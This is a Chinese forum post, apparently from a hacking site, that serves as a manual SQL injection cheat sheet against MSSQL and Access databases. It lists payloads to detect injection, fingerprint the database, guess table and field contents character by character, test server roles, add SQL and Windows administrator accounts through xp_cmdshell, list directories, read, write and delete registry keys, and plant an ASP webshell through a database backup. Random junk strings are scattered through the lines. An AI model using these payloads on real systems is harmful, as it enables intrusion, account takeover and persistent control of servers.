手工脚本注入

admin

手工脚本注入
" ^3 Z- l& O! u3 {: b1.判断是否有注入;and 1=1 ;and 1=2
. H. ?( u; o( j' U# z& ]& N
) g( [6 F8 [* P9 n# D2.初步判断是否是mssql ;and user>0
# h; a6 ~& H# d; e% `
6 O, F) ~& n5 R9 {. G3.注入参数是字符'and [查询条件] and ''='
/ M# o. I5 d& R6 X
1 Z+ X0 n7 }5 O' e$ M" Q! r4 _4.搜索时没过滤参数的'and [查询条件] and '%25'='
  N& X3 p) y: c) m4 m/ X2 p- o
5.判断数据库系统
/ n1 v7 M/ i7 ~( ~0 V( D;and (select count(*) from sysobjects)>0 mssql
  |; |1 d; p" i$ B+ x* ^;and (select count(*) from msysobjects)>0 access
% Y, w  W- `+ D$ x/ y# o3 f5 W
6.猜数据库 ;and (select Count(*) from [数据库名])>0
; ~& E) O* M" B
  m$ h3 U$ ]3 \1 o1 O! V7.猜字段 ;and (select Count(字段名) from 数据库名)>0

8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0

7 r( l" j7 p& y2 a! M. D9.(1)猜字段的ascii值（access）
; @1 g0 E9 o4 G0 @/ ^;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0
5 [) t. @! W$ t0 D. x
(2)猜字段的ascii值（mssql）
+ B/ p8 {8 F" S" e* T" {;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0

  E0 J% T! G, V# s10.测试权限结构（mssql）
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
$ c/ D7 A3 b6 X$ z5 }/ j$ {# N;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
7 ]0 F5 u; A7 j% ]$ v! J* r2 p;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
# M! k8 l$ ^6 X2 G; X2 O& g1 G;and 1=(select IS_MEMBER('db_owner'));--

11.添加mssql和系统的帐户
2 q9 e7 c0 ]$ s7 T8 Q; h;exec master.dbo.sp_addlogin username;--
, _- `, g+ \9 X+ h& ~
;exec master.dbo.sp_password null,username,password;--

2 J/ K8 W6 Q1 D- j, z;exec master.dbo.sp_addsrvrolemember sysadmin username;--

;exec master.dbo.xp_cmdshell 'net user username password
) r( Y9 A0 C% V; H, r) l4 |/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';--

" A3 v: o3 g7 l;exec master.dbo.xp_cmdshell 'net user username password /add';--

2 T7 {2 W; s6 ?* R" ~) q" R;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--
- P: Q. W/ K0 R) W, \& p7 v1 [5 C
: K6 S  S6 _0 V7 u. P1 I12.(1)遍历目录

;create table dirs(paths varchar(100), id int)
;insert dirs exec master.dbo.xp_dirtree 'c:\'
$ V' q/ b  ^! Z! W/ a1 _;and (select top 1 paths from dirs)>0
4 R, a. Y8 Y5 W7 M: O' }6 [3 x: T;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>)
# K' u3 G& ?  m1 C
. f5 ^5 J4 b: |. J9 A2 @(2)遍历目录
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器
" }5 O8 k! v& R;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构
/ ^7 k+ B5 F+ e: G  j) Y) ?% U;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容
( J+ E+ z0 g0 \0 ?% X* G
13.mssql中的存储过程
& V: S9 x4 q: W2 `9 D
( m( O- W; k0 S. f  Oxp_regenumvalues 注册表根键, 子键
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值

1 L+ I) Q: b8 R" C$ `  Oxp_regread 根键,子键,键值名
, \- q0 v" G5 m# ^4 s& t;exec xp_regread
. r$ n, f" e7 r9 @4 C' W; w& ^'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值

# I5 G- q6 u4 n+ f3 k9 E4 @, uxp_regwrite 根键,子键, 值名, 值类型, 值
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表
% g" O* t1 ]0 P% q/ b9 D
xp_regdeletevalue 根键,子键,值名
/ V/ ?3 b4 d. N+ Z* G, ~) w) ^
2 P; Y# u/ F0 J7 [, c. d8 nexec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值

! J6 J. l5 G2 d: L! B4 O* _xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值

14.mssql的backup创建webshell
use model
create table cmd(str image);
6 q* s( y/ }( ^' Zinsert into cmd(str) values ('');
backup database model to disk='c:\l.asp';
& i# F. w# s2 p1 B5 k' _
3 A: G8 H' i9 {8 J1 z( ]15.mssql内置函数
$ X  k2 w. X9 ^" g" b;and (select @@version)>0 获得Windows的版本号
1 v( M# [0 W( A+ U8 Y  h;and user_name()='dbo' 判断当前系统的连接用户是不是sa
;and (select user_name())>0 爆当前系统的连接用户
;and (select db_name())>0 得到当前连接的数据库
2 L$ V) H: E0 y; G
' p- T( @0 h/ q, X/ N- J5 N16.简洁的webshell
% c0 p6 Z# [, l- o( G7 p
3 e8 b6 C4 v- @. b% @3 t) Ause model

create table cmd(str image);

1 B  b8 o, c" @6 d; o( Tinsert into cmd(str) values ('');
% p% C. _9 [- m9 m  e4 d
; F  c+ @1 k" d  c" abackup database model to disk='g:\wwwtest\l.asp';

/ l* @' {' d) L. f3 y

老男孩

现在很多防注入啊，有其他注入字符码